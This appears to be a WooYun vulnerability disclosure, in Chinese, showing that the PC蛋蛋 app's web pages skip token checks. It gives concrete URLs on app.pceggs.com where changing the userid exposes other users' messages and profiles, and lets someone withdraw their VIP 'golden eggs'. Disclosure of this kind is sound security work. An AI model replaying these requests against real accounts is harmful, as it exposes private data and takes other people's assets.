WooYun.org

由于PC蛋蛋的App的Web端对token审计不严格而引发的隐私信息泄露。
0x01 准备工作
硬件：iPhone6、Broadcom 802.11n网卡的iMac
工具：sniffer tools
启用承载网络（虚拟AP）：

下载APP：

注册登录：

0x02 证明漏洞
sniffer抓一下查看Message的包：

GET /page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8&keycode=3B33F47EA87C9B19AE2A1E41E75BBF7 HTTP/1.1
Host: app.pceggs.com
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B436
Accept-Language: zh-cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

地址放到Chrome里访问下：

http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8&keycode=3B33F47EA87C9B19AE2A1E41E75BBF7
发现是可以访问的，那就是token和keycode起到了作用？OK，我们逐个参数去掉测试一下。
去掉keycode参数：

http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867&token=qigqrsrw8r8pa3bbd7coc7qa5s2atpqtql2caec8
发现可以访问，那么难道只检查了token？我们把token去掉看看
去掉token参数：

http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=19118867
见证奇迹的时刻，居然还可以访问！！难道就没有校验token？？赶快换个userid试试！
1003的userid试试：

http://app.pceggs.com/page/myeggs/app_message.aspx?t=1&v=2.0.6&userid=1003
奇迹出现了，居然……

那其他页面存在这种问题吗？赶快看看……
个人中心：

http://app.pceggs.com/page/myeggs/app_myeggs.aspx?t=1&v=2.0.6&userid=17789037
无验证token查看VIP金蛋：

提取金蛋：

提取金蛋成功：

http://app.pceggs.com/page/myeggs/app_vip.aspx?type=1&t=1&v=2.0.6&userid=17789037
还有其他页面不罗列了，都是同样的问题。